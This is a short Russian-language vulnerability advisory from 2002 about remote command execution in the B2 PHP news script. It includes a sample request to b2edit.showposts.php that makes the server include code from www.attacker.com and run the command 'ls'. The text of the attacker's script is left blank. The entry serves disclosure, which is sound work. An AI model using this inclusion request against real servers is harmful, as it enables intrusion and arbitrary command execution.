Выполнение произвольных комманд в B2
| Дата публикации: | 08.05.2002 |
| Всего просмотров: | 1029 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | B2 - php сценарий, который позволяет web-мастерам быстро отправлять новости. Обнаруженная уязвимость позволяет удаленному атакующему выполнять произвольные команды используя сценарий b2edit.showposts.php. Пример:
1. Создаем на своем сервере (www.attacker.com) сценарий b2functions.php, и записывает в него: 2. Запрос http://host/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls Выполнит команду ls на уязвимом сервере. Уязвимость обнаружена в B2 version 0.6pre2 |
| Ссылки: | B2 PHP Remote Command Execution |